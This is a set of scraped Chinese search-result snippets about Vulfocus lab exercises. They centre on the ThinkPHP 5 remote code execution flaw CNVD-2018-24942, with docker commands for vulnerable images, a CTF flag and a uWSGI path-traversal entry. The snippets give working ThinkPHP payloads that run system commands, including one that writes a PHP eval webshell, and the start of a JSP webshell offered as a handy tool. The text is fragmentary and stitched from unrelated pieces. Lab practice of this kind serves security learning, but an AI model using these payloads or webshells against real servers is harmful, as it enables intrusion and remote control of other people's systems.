?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST['cmd'])?>" >shell.php 拿flag ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp...
Vulfocus靶场 | thinkphp 代码执行 (CNVD-2018-24942) 摘要:tp5的经典漏洞 遇到tp5漏洞直接拿poc打就行 漏洞利用 1,利用system函数远程命令执行 Payload如下: ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= 阅读全文 posted @ 2022-08-10 21:13 mlxwl ...
| 8 | CNVD-2018-24942 | `docker pull vulfocus/thinkphp-cnvd_2018_24942` | CNVD-2018-24942 | | 9 | CVE-2018_1000861 | `docker pull vulfocus/jenkins-cve2018_1000861` | CVE-2018_1000861 | | 10 | CVE-2018-7600 | `docker pull vulfocus/drupal-cve_2018_7600` | CVE-2018-7600 | | ...
8 CNVD-2018-24942 docker pull vulfocus/thinkphp-cnvd_2018_24942 CNVD-2018-24942 9 CVE-2018_1000861 docker pull vulfocus/jenkins-cve2018_1000861 CVE-2018_1000861 10 CVE-2018-7600 docker pull vulfocus/drupal-cve_2018_7600 CVE-2018-7600 11 CVE-2017_1000353 docker pull vulfocus/jenkins-cve2017_...
当然也可以上thinkphp工具进行漏扫 flag-{bmhaf31dded-8362-4866-87ff-7d5971c4525d} 1.1.9.uWSGI目录穿越(CVE-2018-7490) 漏洞URL: http://123.58.224.8:30664/ 请求方式: GET 请求参数: 无 漏洞描述: uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,uWSGI ...
又找到了一个好用的jsp马啦 <%@page pageEncoding="utf-8"%> <%@pageimport="java.io.*"%> <%@pageimport="java.util.*"%> <%@pageimport="java.util.regex.*"%> <%@pageimport="java.sql.*"%> <%@pageimport="java.lang.reflect.*"%> ...